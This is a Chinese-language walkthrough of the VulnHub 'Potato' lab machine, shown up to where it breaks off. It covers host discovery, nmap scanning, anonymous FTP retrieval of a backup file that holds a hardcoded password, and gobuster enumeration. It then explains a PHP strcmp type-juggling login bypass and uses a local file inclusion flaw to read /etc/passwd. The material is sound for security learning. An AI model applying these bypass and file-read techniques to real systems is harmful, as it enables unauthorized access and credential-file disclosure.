Potato
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Potato]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.85.0/16 | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.114 08:00:27:77:c6:7c 2 120 PCS Systemtechnik GmbH
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:b5:6e:e2 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.114
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.114 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-11 01:55 EST
Nmap scan report for bogon (192.168.56.114)
Host is up (0.00015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ef:24:0e:ab:d2:b3:16:b4:4b:2e:27:c0:5f:48:79:8b (RSA)
| 256 f2:d8:35:3f:49:59:85:85:07:e6:a2:0e:65:7a:8c:4b (ECDSA)
|_ 256 0b:23:89:c3:c0:26:d5:64:5e:93:b7:ba:f5:14:7f:3e (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Potato company
|_http-server-header: Apache/2.4.41 (Ubuntu)
2112/tcp open ftp ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 901 Aug 2 2020 index.php.bak
|_-rw-r--r-- 1 ftp ftp 54 Aug 2 2020 welcome.msg
MAC Address: 08:00:27:77:C6:7C (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.19 seconds
目标主机有3个开放端口22(SSH),80(http)以及2112(ftp)
Get Access
从FTP服务着手信息的收集,
┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ ftp 192.168.56.114 -P 2112
Connected to 192.168.56.114.
220 ProFTPD Server (Debian) [::ffff:192.168.56.114]
Name (192.168.56.114:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230-Welcome, archive user [email protected] !
230-
230-The local time is: Fri Nov 11 14:57:04 2022
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||47701|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x 2 ftp ftp 4.0k Aug 2 2020 .
drwxr-xr-x 2 ftp ftp 4.0k Aug 2 2020 ..
-rw-r--r-- 1 ftp ftp 901 Aug 2 2020 index.php.bak
-rw-r--r-- 1 ftp ftp 54 Aug 2 2020 welcome.msg
226 Transfer complete
ftp> get index.php.bak
local: index.php.bak remote: index.php.bak
229 Entering Extended Passive Mode (|||5403|)
150 Opening BINARY mode data connection for index.php.bak (901 bytes)
901 29.58 KiB/s
226 Transfer complete
901 bytes received in 00:00 (14.61 KiB/s)
ftp> get welcome.msg
local: welcome.msg remote: welcome.msg
229 Entering Extended Passive Mode (|||1134|)
150 Opening BINARY mode data connection for welcome.msg (54 bytes)
54 941.68 KiB/s
226 Transfer complete
54 bytes received in 00:00 (46.29 KiB/s)
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ ls
index.php.bak nmap_full_scan welcome.msg
┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ cat index.php.bak
<html>
<head></head>
<body>
<?php
$pass= "potato"; //note Change this password regularly
if($_GET['login']==="1"){
if (strcmp($_POST['username'], "admin") == 0 && strcmp($_POST['password'], $pass) == 0) {
echo "Welcome! </br> Go to the <a href=\"dashboard.php\">dashboard</a>";
setcookie('pass', $pass, time() + 365*24*3600);
}else{
echo "<p>Bad login/password! </br> Return to the <a href=\"index.php\">login page</a> <p>";
}
exit();
}
?>
<form action="index.php?login=1" method="POST">
<h1>Login</h1>
<label><b>User:</b></label>
<input type="text" name="username" required>
</br>
<label><b>Password:</b></label>
<input type="password" name="password" required>
</br>
<input type="submit" id='submit' value='Login' >
</form>
</body>
</html>
┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ cat welcome.msg
Welcome, archive user %U@%R !
The local time is: %T
目标主机允许FTP匿名访问,将文件下载到本地,竟然发现了用户名和密码,太惊喜了
admin
potato
┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ gobuster dir -u http://192.168.56.114 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.114
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/11 01:59:23 Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 316] [--> http://192.168.56.114/admin/]
/potato (Status: 301) [Size: 317] [--> http://192.168.56.114/potato/]
/server-status (Status: 403) [Size: 279]
Progress: 219152 / 220561 (99.36%)===============================================================
2022/11/11 02:00:08 Finished
===============================================================
发现了/admin目录,利用上面发现的用户名和密码登录该页面
但发现并不能成功登录,非常奇怪,尝试了很多次,一直提示密码错误,其实这里是一个坑
PHP里等号只判断它们左右两边的最终结果值,而不判断数据类型.而全等于首先判断等号两边的数据类型是否一致.接着还要判断两边的最终结果值是否一致.如果都一致才会返回true呢.
在网上找到一种利用方法,最终利用的是PHP中NULL == 0的特性
简单来说就是原本password参数应该提交一个字符串,但这里提交一个空数组,这样strcmp()的结果就是NULL,而php中松散比较(==)时NULL等于0,因此满足条件,可以成功登录
成功登录
在Logs栏目下,利用burp工具分析请求,发现选择某个文件时,提交的POST请求体中有参数file,看是否存在本地文件包含漏洞(LFI)
发现存在LFI漏洞,可以读取/etc/passwd文件
root❌0:0:root:/root:/bin/bash
daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin❌2:2:bin:/bin:/usr/sbin/nologin
sys❌3:3:sys:/dev:/usr/sbin/nologin
sync❌4:65534:sync:/bin:/bin/sync
games❌5:60:games:/usr/games:/usr/sbin/nologin
man❌6:12